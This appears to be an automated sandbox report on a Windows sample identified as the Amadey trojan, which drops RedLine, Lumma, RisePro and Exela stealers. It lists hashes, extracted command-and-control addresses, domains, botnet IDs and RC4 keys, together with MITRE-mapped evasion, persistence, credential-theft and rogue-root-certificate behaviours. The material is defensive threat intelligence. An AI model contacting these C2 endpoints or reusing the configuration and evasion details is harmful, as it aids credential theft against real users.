amadey | 3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
18/06/2024, 07:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
Size

1.8MB
MD5

d29281e018d65bfa32ce438793eb3946
SHA1

bdf5938d91eeac019d4d02628ac5f742943f2a64
SHA256

3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d
SHA512

47757f87f4b20ff28ba0d2915f5a203199afaedeb8cc0f4fc970162f79b18a8302cc643755921ddc683c20a493787fa4ed134cff37ce35f16a68b0ac6a4eb85c
SSDEEP

24576:MhszjQCVRN8hoVF8ZxeG3BuiWkxAjpuVO8j4gZ6P3YEozPq8mc/zeH+j1vDUmcpL:4spKGsHeGxxWJj8VO8Ms6SPDe+j1s

Score

10^/10

amadey exelastealer lumma redline risepro 0e6740 @logscloudyt_bot e76b71 livetraffic newbild discovery evasion execution infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

http://147.45.47.155

Attributes

install_dir
9217037dc9
install_file
explortu.exe
strings_key
8e894a8a4a3d0da8924003a561cfb244
url_paths
/ku4Nor9/index.php

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

1
a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

newbild

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

redline

Botnet

LiveTraffic

4.185.27.237:13528

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

lumma

https://parallelmercywksoffw.shop/api

https://liabiliytshareodlkv.shop/api

https://notoriousdcellkw.shop/api

https://conferencefreckewl.shop/api

https://flourhishdiscovrw.shop/api

https://landdumpycolorwskfw.shop/api

https://barebrilliancedkoso.shop/api

https://willingyhollowsk.shop/api

https://distincttangyflippan.shop/api

https://macabrecondfucews.shop/api

https://greentastellesqwm.shop/api

https://stickyyummyskiwffe.shop/api

https://sturdyregularrmsnhw.shop/api

https://lamentablegapingkwaq.shop/api

https://innerverdanytiresw.shop/api

https://standingcomperewhitwo.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023595-236.dat	family_redline
behavioral1/memory/4352-259-0x0000000000850000-0x00000000008A0000-memory.dmp	family_redline
behavioral1/files/0x00070000000235a1-302.dat	family_redline
behavioral1/memory/2372-324-0x0000000000300000-0x0000000000352000-memory.dmp	family_redline
behavioral1/memory/5436-362-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7700de6bf0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
972	powershell.exe
5056	powershell.exe
5448	powershell.exe
5324	powershell.exe
5336	powershell.exe
668	powershell.exe
5276	powershell.exe
2352	powershell.exe
5292	powershell.exe
2760	powershell.exe
5360	powershell.exe
872	powershell.exe
2324	powershell.exe
2352	powershell.exe
5292	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5748	netsh.exe
1060	netsh.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7700de6bf0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7700de6bf0.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	explortu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	7700de6bf0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	38f0c3dd14.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	NewLatest.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	bin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe

Executes dropped EXE 34 IoCs

pid	Process
336	explortu.exe
2364	7700de6bf0.exe
4788	dd6917148a.exe
1120	axplong.exe
2168	38f0c3dd14.exe
624	judit.exe
5044	stub.exe
4352	redline123123.exe
2888	upd.exe
4544	setup222.exe
2372	svhoost.exe
5100	One.exe
5396	gold.exe
5204	lummac2.exe
5432	SetupWizard.exe
5160	SetupWizard.exe
5576	axplong.exe
5596	explortu.exe
3512	drivermanager.exe
4320	NewLatest.exe
5208	Hkbsse.exe
2916	monster.exe
2052	stub.exe
2988	bin.exe
1148	winsvc.exe
3276	Hkbsse.exe
5112	legs.exe
2808	winsvc.exe
1352	Hkbsse.exe
3508	explortu.exe
972	axplong.exe
5488	axplong.exe
5392	explortu.exe
5744	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	7700de6bf0.exe
Key opened	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Wine	axplong.exe

Loads dropped DLL 64 IoCs

pid	Process
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
5044	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe
2052	stub.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd6917148a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\dd6917148a.exe"	explortu.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
72	raw.githubusercontent.com
74	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000700000002354d-75.dat	autoit_exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\.coE186.tmp	SetupWizard.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\wincfg.exe	winsvc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\.coE186.tmp	SetupWizard.exe
File opened for modification	C:\Windows\system32\winsvc.exe	SetupWizard.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\winnet.exe	winsvc.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

pid	Process
5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
336	explortu.exe
2364	7700de6bf0.exe
1120	axplong.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
5596	explortu.exe
5576	axplong.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
972	axplong.exe
3508	explortu.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
4788	dd6917148a.exe
5392	explortu.exe
5488	axplong.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2888 set thread context of 4988	2888	upd.exe	121
PID 5396 set thread context of 5436	5396	gold.exe	133
PID 3512 set thread context of 4452	3512	drivermanager.exe	175
PID 5112 set thread context of 5300	5112	legs.exe	202

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explortu.job	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
File created	C:\Windows\Tasks\axplong.job	7700de6bf0.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe
File created	C:\Windows\Tasks\Hkbsse.job	bin.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5688	sc.exe
1800	sc.exe
1256	sc.exe
4628	sc.exe
4144	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3352	5112	WerFault.exe	200

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
3960	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
1200	tasklist.exe
5896	tasklist.exe
4956	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6000	ipconfig.exe
5700	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5240	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
5496	taskkill.exe
2400	taskkill.exe
4212	taskkill.exe
2632	taskkill.exe
5476	taskkill.exe
1888	taskkill.exe
1656	taskkill.exe
5184	taskkill.exe
4488	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-200405930-3877336739-3533750831-1000\{55C3E26D-1045-4733-8D7D-6CFD0C43F241}	chrome.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	svhoost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	svhoost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
5044	3de0a4c58ecb7054430465d12e60d994b6a98047decb1b4241bb72812032ce5d.exe
336	explortu.exe
336	explortu.exe
2364	7700de6bf0.exe
2364	7700de6bf0.exe
1120	axplong.exe
1120	axplong.exe
2492	chrome.exe
2492	chrome.exe
5916	powershell.exe
5916	powershell.exe
5916	powershell.exe
5596	explortu.exe
5596	explortu.exe
5576	axplong.exe
5576	axplong.exe
